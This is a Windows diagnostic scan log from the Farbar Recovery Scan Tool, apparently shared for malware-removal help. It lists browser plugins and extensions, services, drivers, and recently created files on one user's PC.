FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 - C:\Program Files\Microsoft Office 15\root\Office15\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 - C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3508.1109 - C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @qq.com/npchrome - C:\Program Files (x86)\Common Files\Tencent\Npchrome\npchrome.dll No File
FF Plugin-x32: @qq.com/npqscall - C:\Program Files (x86)\Common Files\Tencent\NPQSCALL\npqscall.dll No File
FF Plugin-x32: @qq.com/QQPhotoDrawEx - C:\Program Files (x86)\Tencent\Qzone\npQQPhotoDrawEx.dll No File
FF Plugin-x32: @qq.com/QzoneMusic - C:\Program Files (x86)\Tencent\QQMusic\QzoneMusic\npQzoneMusic.dll No File
FF Plugin-x32: @qq.com/TXSSO - C:\Program Files (x86)\Common Files\Tencent\TXSSO\1.2.2.1\Bin\npSSOAxCtrlForPTLogin.dll No File
FF Plugin-x32: @tools.google.com/Google Update;version=3 - C:\Program Files (x86)\Google\Update\1.3.24.7\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 - C:\Program Files (x86)\Google\Update\1.3.24.7\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.1.3 - C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin-x32: Adobe Acrobat - C:\Program Files (x86)\Adobe\Acrobat 11.0\Acrobat\Air\nppdf32.dll (Adobe Systems Inc.)
FF Plugin-x32: Adobe Reader - C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin-x32: adobe.com/AdobeAAMDetect - C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect32.dll (Adobe Systems)
FF Plugin-x32: adobe.com/AdobeExManDetect - C:\Program Files (x86)\Adobe\Adobe Extension Manager CS6\npAdobeExManDetectX86.dll (Adobe Systems)
FF Plugin HKCU: @alibaba.com/npAliSSOLogin;version=1.0 - C:\Program Files (x86)\AliWangWang\8.00.08C\npAliSSOLogin.dll (ÌÔ±¦£¨Öйú£©Èí¼þÓÐÏÞ¹«Ë¾)
FF Plugin HKCU: @alibaba.com/npwangwang;version=1.0 - C:\Program Files (x86)\AliWangWang\8.00.08C\npwangwang.dll ( )
FF Plugin HKCU: @talk.google.com/GoogleTalkPlugin - C:\Users\AIR\AppData\Roaming\Mozilla\plugins\npgoogletalk.dll (Google)
FF Plugin HKCU: @talk.google.com/O1DPlugin - C:\Users\AIR\AppData\Roaming\Mozilla\plugins\npo1d.dll (Google)
FF Plugin HKCU: @tools.google.com/Google Update;version=3 - C:\Users\AIR\AppData\Local\Google\Update\1.3.24.7\npGoogleUpdate3.dll (Google Inc.)
FF Plugin HKCU: @tools.google.com/Google Update;version=9 - C:\Users\AIR\AppData\Local\Google\Update\1.3.24.7\npGoogleUpdate3.dll (Google Inc.)
FF Plugin HKCU: facebook.com/fbDesktopPlugin - C:\Users\AIR\AppData\Local\Facebook\Messenger\2.1.4814.0\npFbDesktopPlugin. dll (Facebook, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Users\AIR\AppData\Roaming\mozilla\plugins\npgoogletalk.dll (Google)
FF Plugin ProgramFiles/Appdata: C:\Users\AIR\AppData\Roaming\mozilla\plugins\npo1d.dll (Google)
FF HKLM-x32\...\Firefox\Extensions: [ntfdsaftsfdfdxx@mozilla.org] - C:\Users\AIR\AppData\Roaming\iPumper\extension_firefox.xpi
FF HKLM-x32\...\Firefox\Extensions: [web2pdfextension@web2pdf.adobedotcom] - C:\Program Files (x86)\Adobe\Acrobat 11.0\Acrobat\Browser\WCFirefoxExtn
FF Extension: Adobe Acrobat - Create PDF - C:\Program Files (x86)\Adobe\Acrobat 11.0\Acrobat\Browser\WCFirefoxExtn [2013-09-14]

Chrome:
=======
CHR DefaultSearchKeyword: google.com.hk
CHR Plugin: (Widevine Content Decryption Module) - C:\Users\AIR\AppData\Local\Google\Chrome\User Data\WidevineCDM\1.4.2.464\_platform_specific\win_x86\widevinecdmadapter.dl l ()
CHR Plugin: (Shockwave Flash) - C:\Program Files (x86)\Google\Chrome\Application\34.0.1847.131\PepperFlash\pepflashplayer.dl l ()
CHR Plugin: (Chrome Remote Desktop Viewer) - internal-remoting-viewer
CHR Plugin: (Native Client) - C:\Program Files (x86)\Google\Chrome\Application\34.0.1847.131\ppGoogleNaClPluginChrome.dll ()
CHR Plugin: (Chrome PDF Viewer) - C:\Program Files (x86)\Google\Chrome\Application\34.0.1847.131\pdf.dll ()
CHR Plugin: (Screen Capture Plugin) - C:\Users\AIR\AppData\Local\Google\Chrome\User Data\Default\Extensions\alelhddbbhepgpmgidjdcjakblofbmce\3.6.9_0\plugins/screen_capture.dll No File
CHR Plugin: (Adobe Create PDF) - C:\Users\AIR\AppData\Local\Google\Chrome\User Data\Default\Extensions\efaidnbmnnnibpcajpcglclefindmkaj\11.0.3.37_0\plugin/npWCChromeExtnStub.dll No File
CHR Plugin: (Microsoft Office 2010) - C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL (Microsoft Corporation)
CHR Plugin: (AdobeExManDetect) - C:\Program Files (x86)\Adobe\Adobe Extension Manager CS6\npAdobeExManDetectX86.dll (Adobe Systems)
CHR Plugin: (Adobe Acrobat) - C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
CHR Plugin: (AliSSOLogin plugin) - C:\Program Files (x86)\AliWangWang\8.00.08C\npAliSSOLogin.dll (ÌÔ±¦£¨Öйú£©Èí¼þÓÐÏÞ¹«Ë¾)
CHR Plugin: (AliWangWang Plug-In For Firefox and Netscape) - C:\Program Files (x86)\AliWangWang\8.00.08C\npwangwang.dll ( )
CHR Plugin: (AdobeAAMDetect) - C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect32.dll (Adobe Systems)
CHR Plugin: (Google Earth Plugin) - C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll (Google)
CHR Plugin: (Java Deployment Toolkit 7.0.510.13) - C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
CHR Plugin: (Java(TM) Platform SE 7 U51) - C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
CHR Plugin: (VLC Web Plugin) - C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
CHR Plugin: (Windows Live™ Photo Gallery) - C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
CHR Plugin: (iTunes Application Detector) - C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
CHR Plugin: (Microsoft Office 2013) - C:\Program Files\Microsoft Office 15\root\Office15\NPSPWRAP.DLL (Microsoft Corporation)
CHR Plugin: (Microsoft Office 2013) - C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX86\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll (Microsoft Corporation)
CHR Plugin: (Facebook Desktop) - C:\Users\AIR\AppData\Local\Facebook\Messenger\2.1.4814.0\npFbDesktopPlugin. dll (Facebook, Inc.)
CHR Plugin: (Google Update) - C:\Users\AIR\AppData\Local\Google\Update\1.3.23.9\npGoogleUpdate3.dll No File
CHR Plugin: (Google Talk Plugin) - C:\Users\AIR\AppData\Roaming\Mozilla\plugins\npgoogletalk.dll (Google)
CHR Plugin: (Google Talk Plugin Video Renderer) - C:\Users\AIR\AppData\Roaming\Mozilla\plugins\npo1d.dll (Google)
CHR Plugin: (Shockwave for Director) - C:\Windows\SysWOW64\Adobe\Director\np32dsw_1207148.dll (Adobe Systems, Inc.)
CHR Plugin: (Shockwave Flash) - C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_12_0_0_77.dll No File
CHR Plugin: (Alipay Security Control 3) - C:\Windows\system32\aliedit\3.7.0.0\npAliSecCtrl.dll No File
CHR Plugin: (Alipay webmod control) - C:\Windows\system32\aliedit\3.7.0.0\npalidcp.dll No File
CHR Plugin: (Alipay security control) - C:\Windows\system32\aliedit\3.7.0.0\npaliedit.dll No File
CHR Plugin: (iTrusChina iTrusPTA,XEnroll,iEnroll,hwPTA,UKeyInstalls Firefox Plugin) - C:\Windows\system32\itruscert\NPComBrg701.dll No File
CHR Plugin: (Silverlight Plug-In) - c:\Program Files (x86)\Microsoft Silverlight\5.1.30214.0\npctrl.dll ( Microsoft Corporation)
CHR Extension: (Awesome Screenshot: Capture & Annotate) - C:\Users\AIR\AppData\Local\Google\Chrome\User Data\Default\Extensions\alelhddbbhepgpmgidjdcjakblofbmce [2013-11-24]
CHR Extension: (Google Docs) - C:\Users\AIR\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2013-11-24]
CHR Extension: (Google Drive) - C:\Users\AIR\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2013-11-24]
CHR Extension: (YouTube) - C:\Users\AIR\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2013-11-24]
CHR Extension: (Adblock Plus) - C:\Users\AIR\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2013-11-24]
CHR Extension: (Google Search) - C:\Users\AIR\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2013-11-24]
CHR Extension: (Screen Capture (by Google)) - C:\Users\AIR\AppData\Local\Google\Chrome\User Data\Default\Extensions\cpngackimfmofbokmjmljamhdncknpmg [2013-11-24]
CHR Extension: (Adobe Acrobat - Create PDF) - C:\Users\AIR\AppData\Local\Google\Chrome\User Data\Default\Extensions\efaidnbmnnnibpcajpcglclefindmkaj [2013-11-24]
CHR Extension: (Marble) - C:\Users\AIR\AppData\Local\Google\Chrome\User Data\Default\Extensions\ijhebjoppbkfocoeceijgihihgckeool [2013-11-24]
CHR Extension: (Neokazam!) - C:\Users\AIR\AppData\Local\Google\Chrome\User Data\Default\Extensions\kbnlajaechdnkmidcfkmlaofdgbdadfe [2014-03-24]
CHR Extension: (Google Wallet) - C:\Users\AIR\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-11-24]
CHR Extension: (Docs PDF/PowerPoint Viewer (by Google)) - C:\Users\AIR\AppData\Local\Google\Chrome\User Data\Default\Extensions\nnbmlagghjjcbdhgmkedmbmedengocbn [2014-02-09]
CHR Extension: (Gmail) - C:\Users\AIR\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2013-11-24]
CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - C:\Program Files (x86)\Adobe\Acrobat 11.0\Acrobat\Browser\WCChromeExtn\WCChromeExtn.crx [2013-09-05]
CHR HKLM-x32\...\Chrome\Extension: [kekfoodhbhpjhjcdecjngamojfhknooc] - C:\Users\AIR\AppData\Roaming\iPumper\extension_chrome.crx [2013-09-05]

==================== Services (Whitelisted) =================

R2 AlipaySecSvc; C:\Program Files (x86)\alipay\alieditplus\AlipaySecSvc.exe [540032 2014-03-07] (Alipay Inc. )
R2 AVGIDSAgent; C:\Program Files (x86)\AVG\AVG2014\avgidsagent.exe [3645456 2014-04-18] (AVG Technologies CZ, s.r.o.)
R2 avgwd; C:\Program Files (x86)\AVG\AVG2014\avgwdsvc.exe [291912 2014-03-27] (AVG Technologies CZ, s.r.o.)
R2 ClickToRunSvc; C:\Program Files\Microsoft Office 15\ClientX64\OfficeClickToRun.exe [2211000 2014-03-30] (Microsoft Corporation)
R2 HP Power Assistant Service; C:\Program Files\Hewlett-Packard\HP Power Assistant\HPPA_Service.exe [107576 2010-11-17] ()
R2 ImeDictUpdateService; C:\Program Files\Common Files\Microsoft Shared\IME14\SHARED\IMEDICTUPDATE.EXE [83312 2010-10-20] (Microsoft Corporation)
R2 Motorola Device Manager; C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\MotoHelperService.exe [137528 2013-11-15] (Motorola Mobility LLC)
S3 OpenVPNService; C:\Program Files (x86)\OpenVPN\bin\openvpnserv.exe [29920 2013-03-07] (The OpenVPN Project)
R2 pdfcDispatcher; C:\Program Files (x86)\PDF Complete\pdfsvc.exe [1127448 2011-02-01] (PDF Complete Inc)
R2 SENADB; C:\Program Files (x86)\EPSON_P2B\Printer Software\Status Monitor\seksmdb.exe [103584 2012-07-11] ()
R2 SEVPNCLIENT; C:\Program Files\SoftEther VPN Client\vpnclient_x64.exe [4178488 2013-11-24] (SoftEther Project at University of Tsukuba, Japan.)

==================== Drivers (Whitelisted) ====================

R1 Avgdiska; C:\Windows\System32\DRIVERS\avgdiska.sys [153368 2014-03-27] (AVG Technologies CZ, s.r.o.)
R1 AVGIDSDriver; C:\Windows\System32\DRIVERS\avgidsdrivera.sys [237336 2014-04-18] (AVG Technologies CZ, s.r.o.)
R0 AVGIDSHA; C:\Windows\System32\DRIVERS\avgidsha.sys [192792 2014-03-27] (AVG Technologies CZ, s.r.o.)
R1 Avgldx64; C:\Windows\System32\DRIVERS\avgldx64.sys [236824 2014-03-27] (AVG Technologies CZ, s.r.o.)
R0 Avgloga; C:\Windows\System32\DRIVERS\avgloga.sys [324376 2014-03-27] (AVG Technologies CZ, s.r.o.)
R0 Avgmfx64; C:\Windows\System32\DRIVERS\avgmfx64.sys [130840 2014-03-31] (AVG Technologies CZ, s.r.o.)
R0 Avgrkx64; C:\Windows\System32\DRIVERS\avgrkx64.sys [32536 2014-03-27] (AVG Technologies CZ, s.r.o.)
R1 Avgtdia; C:\Windows\System32\DRIVERS\avgtdia.sys [274200 2014-03-31] (AVG Technologies CZ, s.r.o.)
S3 ManyCam; C:\Windows\System32\DRIVERS\mcvidrv_x64.sys [44928 2012-10-11] (ManyCam LLC)
S3 mcaudrv_simple; C:\Windows\System32\drivers\mcaudrv_x64.sys [28160 2013-01-31] (ManyCam LLC)
R3 Neo_VPN; C:\Windows\System32\DRIVERS\Neo_0019.sys [28768 2013-04-13] (SoftEther Project at University of Tsukuba, Japan.)
R2 PassGuard; C:\Windows\system32\drivers\PassGuard_x64.sys [254832 2013-09-16] ()
S3 motccgpfl; system32\DRIVERS\motccgpfl.sys [X]
S3 motport; system32\DRIVERS\motport.sys [X]
U3 kxldrpow; \??\C:\Users\AIR\AppData\Local\Temp\kxldrpow.sys [X]

==================== NetSvcs (Whitelisted) ===================


==================== One Month Created Files and Folders ========

2014-05-10 21:43 - 2014-05-10 21:43 - 00034457 _____ () C:\Users\AIR\Desktop\FRST.txt
2014-05-10 21:43 - 2014-05-10 21:43 - 00000000 ____D () C:\FRST
2014-05-10 21:42 - 2014-05-10 21:42 - 02065408 _____ (Farbar) C:\Users\AIR\Desktop\FRST64.exe
2014-05-10 20:49 - 2014-05-10 20:49 - 00025658 _____ () C:\Users\AIR\AppData\Local\recently-used.xbel
2014-05-10 20:35 - 2014-05-10 20:35 - 00058704 _____ () C:\Users\AIR\Desktop\ark.txt
2014-05-10 19:45 - 2014-05-10 19:45 - 00380416 _____ () C:\Users\AIR\Desktop\63r8jur5.exe
2014-05-10 19:41 - 2014-05-10 19:41 - 00009613 _____ () C:\Users\AIR\Desktop\attach.txt
2014-05-10 19:41 - 2014-05-10 19:40 - 00027894 _____ () C:\Users\AIR\Desktop\dds.txt
2014-05-10 19:38 - 2014-05-10 19:38 - 00688992 ____R (Swearware) C:\Users\AIR\Desktop\dds.scr
2014-05-10 19:37 - 2014-05-10 19:37 - 00017745 _____ () C:\Users\AIR\Desktop\hijackthis.log
2014-05-10 19:35 - 2014-05-10 19:35 - 00388608 _____ (Trend Micro Inc.) C:\Users\AIR\Desktop\HijackThis.exe
2014-05-10 18:30 - 2014-05-10 18:30 - 08326064 _____ (McAfee, Inc.) C:\Users\AIR\Desktop\SecurityScan_Release.exe
2014-05-10 17:26 - 2014-05-10 17:26 - 02347384 _____ (ESET) C:\Users\AIR\Desktop\esetsmartinstaller_enu.exe
2014-05-10 17:26 - 2014-05-10 17:26 - 00000000 ____D () C:\Program Files (x86)\ESET
2014-05-10 17:01 - 2010-08-30 08:34 - 00536576 _____ (SQLite Development Team) C:\Windows\SysWOW64\sqlite3.dll
2014-05-10 17:00 - 2014-05-10 17:00 - 01316991 _____ () C:\Users\AIR\Desktop\AdwCleaner.exe
2014-05-10 16:29 - 2014-05-10 16:29 - 00000000 ____D () C:\Users\AIR_2\AppData\Local\alipay
2014-05-10 16:28 - 2014-05-10 16:29 - 00000000 ____D () C:\Users\AIR_2\AppData\Local\Google
2014-05-10 16:28 - 2014-05-10 16:28 - 00125000 _____ () C:\Users\AIR_2\AppData\Local\GDIPFONTCACHEV1.DAT
2014-05-10 16:28 - 2014-05-10 16:28 - 00000000 ____D () C:\Users\AIR_2\AppData\Roaming\Google
2014-05-10 16:28 - 2014-05-10 16:28 - 00000000 ____D () C:\Users\AIR_2\AppData\Roaming\ATI
2014-05-10 16:28 - 2014-05-10 16:28 - 00000000 ____D () C:\Users\AIR_2\AppData\Local\ATI
2014-05-10 16:27 - 2014-05-10 16:55 - 00000000 ____D () C:\Users\AIR_2\AppData\Roaming\AVG2014
2014-05-10 16:27 - 2014-05-10 16:27 - 00000000 __SHD () C:\Users\AIR_2\AppData\Local\EmieUserList
2014-05-10 16:27 - 2014-05-10 16:27 - 00000000 __SHD () C:\Users\AIR_2\AppData\Local\EmieSiteList
2014-05-10 16:27 - 2014-05-10 16:27 - 00000000 ____D () C:\Users\AIR_2\AppData\Roaming\Apple Computer
2014-05-10 16:27 - 2014-05-10 16:27 - 00000000 ____D () C:\Users\AIR_2\AppData\Local\PDFC
2014-05-10 16:27 - 2014-05-10 16:27 - 00000000 ____D () C:\Users\AIR_2\AppData\Local\Avg2014
2014-05-10 16:27 - 2014-05-10 16:27 - 00000000 ____D () C:\Users\AIR_2\AppData\Local\Adobe
2014-05-10 16:26 - 2014-05-10 16:55 - 00000000 ___RD () C:\Users\AIR_2\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
2014-05-10 16:26 - 2014-05-10 16:55 - 00000000 ___RD () C:\Users\AIR_2\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance
2014-05-10 16:26 - 2014-05-10 16:55 - 00000000 ___RD () C:\Users\AIR_2\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories
2014-05-10 16:26 - 2014-05-10 16:55 - 00000000 ____D () C:\Users\AIR_2\AppData\Roaming\TaobaoProtect
2014-05-10 16:26 - 2014-05-10 16:55 - 00000000 ____D () C:\Users\AIR_2\AppData\Roaming\Motorola Mobility
2014-05-10 16:26 - 2014-05-10 16:55 - 00000000 ____D () C:\Users\AIR_2
2014-05-10 16:26 - 2014-05-10 16:29 - 00002193 _____ () C:\Users\AIR_2\Desktop\Google Chrome.lnk
2014-05-10 16:26 - 2014-05-10 16:27 - 00000000 ___RD () C:\Users\AIR_2\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools
2014-05-10 16:26 - 2014-05-10 16:27 - 00000000 ____D () C:\Users\AIR_2\AppData\Roaming\Adobe
2014-05-10 16:26 - 2014-05-10 16:26 - 00001327 _____ () C:\Users\AIR_2\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2014-05-10 16:26 - 2014-05-10 16:26 - 00000808 __RSH () C:\Users\AIR_2\ntuser.pol
2014-05-10 16:26 - 2014-05-10 16:26 - 00000020 ___SH () C:\Users\AIR_2\ntuser.ini
2014-05-10 16:26 - 2013-09-01 15:19 - 00000000 ____D () C:\Users\AIR_2\AppData\Roaming\Macromedia
2014-05-10 16:26 - 2013-05-10 09:25 - 00000000 ____D () C:\Users\AIR_2\AppData\Roaming\TuneUp Software
2014-05-10 16:26 - 2013-02-08 12:55 - 00000000 ____D () C:\Users\AIR_2\AppData\Local\Microsoft Help
2014-05-10 16:22 - 2014-05-10 16:22 - 00000584 __RSH () C:\Users\AIR\ntuser.pol
2014-05-10 14:44 - 2014-05-10 21:36 - 00003642 _____ () C:\Windows\System32\Tasks\RegWrite
2014-05-09 21:25 - 2014-05-09 21:25 - 00012272 _____ () C:\Users\AIR\Desktop\fiesta mc list.xlsx
2014-05-09 21:11 - 2014-05-09 21:11 - 00090643 _____ () C:\Users\AIR\Desktop\65th Anniversary Concert_Food & Beverage_Sample.xlsx
2014-05-07 14:31 - 2014-04-29 22:01 - 23547904 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-05-07 14:31 - 2014-04-29 21:40 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-05-07 14:31 - 2014-04-29 20:48 - 17384448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2014-05-07 14:31 - 2014-04-29 20:34 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2014-05-07 06:24 - 2014-05-07 06:24 - 00000000 __SHD () C:\Users\AIR\AppData\Local\EmieUserList
2014-05-07 06:24 - 2014-05-07 06:24 - 00000000 __SHD () C:\Users\AIR\AppData\Local\EmieSiteList
2014-05-07 03:22 - 2014-05-10 17:16 - 00001624 _____ () C:\Windows\setupact.log
2014-05-07 03:22 - 2014-05-07 03:22 - 00000000 _____ () C:\Windows\setuperr.log
2014-05-07 03:19 - 2014-05-07 03:19 - 00000000 ___SD () C:\Windows\system32\CompatTel
2014-05-07 03:02 - 2014-03-06 17:31 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2014-05-07 03:02 - 2014-03-06 16:59 - 00066048 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2014-05-07 03:02 - 2014-03-06 16:57 - 00548352 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2014-05-07 03:02 - 2014-03-06 16:57 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2014-05-07 03:02 - 2014-03-06 16:53 - 02767360 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-05-07 03:02 - 2014-03-06 16:40 - 00051200 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2014-05-07 03:02 - 2014-03-06 16:39 - 00033792 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2014-05-07 03:02 - 2014-03-06 16:32 - 00574976 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2014-05-07 03:02 - 2014-03-06 16:29 - 00139264 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2014-05-07 03:02 - 2014-03-06 16:29 - 00111616 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2014-05-07 03:02 - 2014-03-06 16:28 - 00752640 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2014-05-07 03:02 - 2014-03-06 16:15 - 00940032 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2014-05-07 03:02 - 2014-03-06 16:11 - 05784064 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2014-05-07 03:02 - 2014-03-06 16:09 - 00453120 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2014-05-07 03:02 - 2014-03-06 16:03 - 00586240 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2014-05-07 03:02 - 2014-03-06 16:02 - 00455168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2014-05-07 03:02 - 2014-03-06 16:02 - 00061952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2014-05-07 03:02 - 2014-03-06 16:01 - 00051200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll
2014-05-07 03:02 - 2014-03-06 15:56 - 00038400 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2014-05-07 03:02 - 2014-03-06 15:48 - 00195584 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2014-05-07 03:02 - 2014-03-06 15:47 - 02178048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2014-05-07 03:02 - 2014-03-06 15:46 - 04254720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2014-05-07 03:02 - 2014-03-06 15:46 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2014-05-07 03:02 - 2014-03-06 15:45 - 00032768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2014-05-07 03:02 - 2014-03-06 15:42 - 00296960 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2014-05-07 03:02 - 2014-03-06 15:40 - 00440832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2014-05-07 03:02 - 2014-03-06 15:38 - 00112128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2014-05-07 03:02 - 2014-03-06 15:36 - 00592896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2014-05-07 03:02 - 2014-03-06 15:22 - 00367616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2014-05-07 03:02 - 2014-03-06 15:21 - 00628736 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-05-07 03:02 - 2014-03-06 15:13 - 00032256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll
2014-05-07 03:02 - 2014-03-06 15:11 - 02043904 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-05-07 03:02 - 2014-03-06 15:07 - 00164864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll
2014-05-07 03:02 - 2014-03-06 15:01 - 00244224 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2014-05-07 03:02 - 2014-03-06 14:53 - 13551104 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2014-05-07 03:02 - 2014-03-06 14:46 - 00524288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2014-05-07 03:02 - 2014-03-06 14:40 - 01967104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2014-05-07 03:02 - 2014-03-06 14:36 - 11745792 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2014-05-07 03:02 - 2014-03-06 14:22 - 02260480 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-05-07 03:02 - 2014-03-06 13:58 - 01400832 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-05-07 03:02 - 2014-03-06 13:50 - 00846336 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2014-05-07 03:02 - 2014-03-06 13:43 - 00704512 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2014-05-07 03:02 - 2014-03-06 13:41 - 01789440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2014-05-07 03:02 - 2014-03-06 13:36 - 01143808 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2014-05-06 23:42 - 2014-04-14 10:24 - 00465408 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll
2014-05-06 23:42 - 2014-04-14 10:19 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2014-05-03 09:59 - 2014-05-03 09:59 - 00000000 ____D () C:\Users\AIR\AppData\Local\{3682DD9A-1555-459A-84C9-46FBA34C3AFF}
2014-05-02 12:46 - 2014-05-02 12:46 - 00000000 ____D () C:\Users\AIR\AppData\Local\{E8E24688-FD0A-4605-81C2-280A86A79587}
2014-04-28 21:23 - 2014-04-28 21:23 - 07559143 _____ () C:\Users\AIR\Desktop\file_20140428.zip
2014-04-28 00:22 - 2014-05-03 10:01 - 00002031 _____ () C:\Users\AIR\Documents\movie.wlmp
2014-04-27 15:29 - 2014-04-27 15:29 - 00000000 ____D () C:\Users\AIR\AppData\Local\{17D1600E-66DF-4C31-A70C-41C04C20BED3}
2014-04-25 00:16 - 2014-04-25 10:52 - 00000000 ____D () C:\Users\AIR\AppData\OICE_15_974FA576_32C1D314_28A8
2014-04-24 16:45 - 2014-04-24 16:45 - 00001120 _____ () C:\Users\AIR\Desktop\501 - 捷徑.lnk
2014-04-23 23:00 - 2014-04-23 23:07 - 00000000 ____D () C:\Users\AIR\Desktop\Moto Photo
2014-04-21 09:08 - 2014-04-21 09:08 - 14813831 _____ () C:\Users\AIR\Desktop\Mom.xcf
2014-04-20 17:44 - 2014-04-20 17:44 - 07559143 _____ () C:\Users\AIR\Desktop\file_20140420.zip
2014-04-20 17:09 - 2014-04-20 17:09 - 00000000 ____D () C:\ProgramData\Avg_Update_0414b
2014-04-18 15:01 - 2014-04-18 15:01 - 00237336 _____ (AVG Technologies CZ, s.r.o.) C:\Windows\system32\Drivers\avgidsdrivera.sys
2014-04-17 01:43 - 2014-04-17 02:16 - 00000000 ____D () C:\FFOutput
2014-04-17 01:42 - 2014-04-17 01:43 - 00000000 ____D () C:\Users\AIR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\FormatFactory
2014-04-17 01:42 - 2014-04-17 01:42 - 00000000 ____D () C:\Program Files (x86)\FreeTime
